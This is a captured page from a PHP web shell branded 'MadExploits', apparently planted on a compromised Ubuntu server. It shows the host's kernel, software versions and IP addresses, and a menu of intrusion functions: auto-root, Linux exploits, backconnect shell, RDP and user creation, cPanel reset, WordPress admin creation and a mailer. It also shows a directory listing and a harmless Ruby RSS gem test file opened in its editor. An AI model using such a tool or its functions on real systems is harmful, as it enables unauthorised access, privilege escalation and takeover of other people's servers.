Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
gems /
3.0.0 /
gems /
rss-0.2.9 /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
dot.png
109
B
-rw-r--r--
rss-assertions.rb
69.07
KB
-rw-r--r--
rss-testcase.rb
11.69
KB
-rw-r--r--
run-test.rb
290
B
-rw-r--r--
test_1.0.rb
8.16
KB
-rw-r--r--
test_2.0.rb
12.29
KB
-rw-r--r--
test_accessor.rb
2.5
KB
-rw-r--r--
test_atom.rb
21.8
KB
-rw-r--r--
test_content.rb
2.61
KB
-rw-r--r--
test_dublincore.rb
9.05
KB
-rw-r--r--
test_image.rb
6.89
KB
-rw-r--r--
test_inherit.rb
1.06
KB
-rw-r--r--
test_itunes.rb
13.37
KB
-rw-r--r--
test_maker_0.9.rb
13.83
KB
-rw-r--r--
test_maker_1.0.rb
14.38
KB
-rw-r--r--
test_maker_2.0.rb
22.15
KB
-rw-r--r--
test_maker_atom_entry.rb
13.77
KB
-rw-r--r--
test_maker_atom_feed.rb
16.19
KB
-rw-r--r--
test_maker_content.rb
1.02
KB
-rw-r--r--
test_maker_dc.rb
4.15
KB
-rw-r--r--
test_maker_image.rb
1.84
KB
-rw-r--r--
test_maker_itunes.rb
18.96
KB
-rw-r--r--
test_maker_slash.rb
832
B
-rw-r--r--
test_maker_sy.rb
919
B
-rw-r--r--
test_maker_taxo.rb
2.24
KB
-rw-r--r--
test_maker_trackback.rb
1000
B
-rw-r--r--
test_maker_xml-stylesheet.rb
1.99
KB
-rw-r--r--
test_parser.rb
2.77
KB
-rw-r--r--
test_parser_1.0.rb
12.07
KB
-rw-r--r--
test_parser_2.0.rb
2.89
KB
-rw-r--r--
test_parser_atom_entry.rb
4.2
KB
-rw-r--r--
test_parser_atom_feed.rb
7.45
KB
-rw-r--r--
test_setup_maker_0.9.rb
6.88
KB
-rw-r--r--
test_setup_maker_1.0.rb
16.2
KB
-rw-r--r--
test_setup_maker_2.0.rb
8.96
KB
-rw-r--r--
test_setup_maker_atom_entry.rb
12.37
KB
-rw-r--r--
test_setup_maker_atom_feed.rb
13.53
KB
-rw-r--r--
test_setup_maker_itunes.rb
4.45
KB
-rw-r--r--
test_setup_maker_slash.rb
1023
B
-rw-r--r--
test_slash.rb
1.32
KB
-rw-r--r--
test_syndication.rb
3.05
KB
-rw-r--r--
test_taxonomy.rb
4.96
KB
-rw-r--r--
test_to_s.rb
19.22
KB
-rw-r--r--
test_trackback.rb
3.68
KB
-rw-r--r--
test_xml-stylesheet.rb
3.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_parser_atom_entry.rb
# frozen_string_literal: false require_relative "rss-testcase" require "rss/atom" module RSS class TestParserAtom < TestCase def test_entry_validation assert_ns("", Atom::URI) do Parser.parse(<<-EOA) <entry/> EOA end assert_ns("", Atom::URI) do Parser.parse(<<-EOA) <entry xmlns="hoge"/> EOA end assert_parse(<<-EOA, :missing_tag, "id", "entry") do <entry xmlns="#{Atom::URI}"/> EOA end assert_parse(<<-EOA, :missing_tag, "title", "entry") do <entry xmlns="#{Atom::URI}"> <id>urn:uuid:506e336c-a26e-4457-917b-b89dca7ae746</id> </entry> EOA end assert_parse(<<-EOA, :missing_tag, "updated", "entry") do <entry xmlns="#{Atom::URI}"> <id>urn:uuid:506e336c-a26e-4457-917b-b89dca7ae746</id> <title>Example Entry</title> </entry> EOA end assert_parse(<<-EOA, :missing_tag, "author", "entry") do <entry xmlns="#{Atom::URI}"> <id>urn:uuid:506e336c-a26e-4457-917b-b89dca7ae746</id> <title>Example Entry</title> <updated>2003-10-10T18:30:02Z</updated> </entry> EOA end assert_parse(<<-EOA, :nothing_raised) do <entry xmlns="#{Atom::URI}"> <id>urn:uuid:506e336c-a26e-4457-917b-b89dca7ae746</id> <title>Example Entry</title> <updated>2003-10-10T18:30:02Z</updated> <author> <name>A person</name> </author> </entry> EOA end end def test_entry entry = RSS::Parser.parse(<<-EOA) <?xml version="1.0" encoding="utf-8"?> <entry xmlns="http://www.w3.org/2005/Atom"> <author> <name>A person</name> </author> <title>Atom-Powered Robots Run Amok</title> <link href="http://example.org/2003/12/13/atom03"/> <id>urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a</id> <updated>2003-12-13T18:30:02Z</updated> <summary>Some text.</summary> </entry> EOA assert_not_nil(entry) assert_equal("Atom-Powered Robots Run Amok", entry.title.content) assert_equal("http://example.org/2003/12/13/atom03", entry.link.href) assert_equal("urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a", entry.id.content) assert_equal(Time.parse("2003-12-13T18:30:02Z"), entry.updated.content) assert_equal("Some text.", entry.summary.content) end def test_entry_author assert_atom_person("author", method(:make_entry_document)) do |entry| assert_equal(2, entry.authors.size) entry.authors.last end end def test_entry_category assert_atom_category(method(:make_entry_document)) do |entry| assert_equal(1, entry.categories.size) entry.category end end def test_entry_content_text assert_atom_content(method(:make_entry_document)) do |entry| entry.content end end def test_entry_contributor assert_atom_person("contributor", method(:make_entry_document)) do |entry| assert_equal(1, entry.contributors.size) entry.contributor end end def test_entry_id entry = RSS::Parser.parse(make_entry_document) assert_equal(ENTRY_ID, entry.id.content) end def test_entry_link assert_atom_link(method(:make_entry_document)) do |entry| assert_equal(1, entry.links.size) entry.link end end def test_published generator = method(:make_entry_document) assert_atom_date_construct("published", generator) do |entry| entry.published end end def test_entry_rights generator = method(:make_entry_document) assert_atom_text_construct("rights", generator) do |entry| entry.rights end end def test_entry_source generator = method(:make_entry_document_with_open_source) assert_atom_source(generator) do |entry| assert_not_nil(entry.source) entry.source end end def test_entry_summary generator = method(:make_entry_document) assert_atom_text_construct("summary", generator) do |entry| entry.summary end end def test_entry_title entry = RSS::Parser.parse(make_entry_document) assert_equal(ENTRY_TITLE, entry.title.content) end def test_entry_updated entry = RSS::Parser.parse(make_entry_document) assert_equal(Time.parse(ENTRY_UPDATED), entry.updated.content) end end end
Close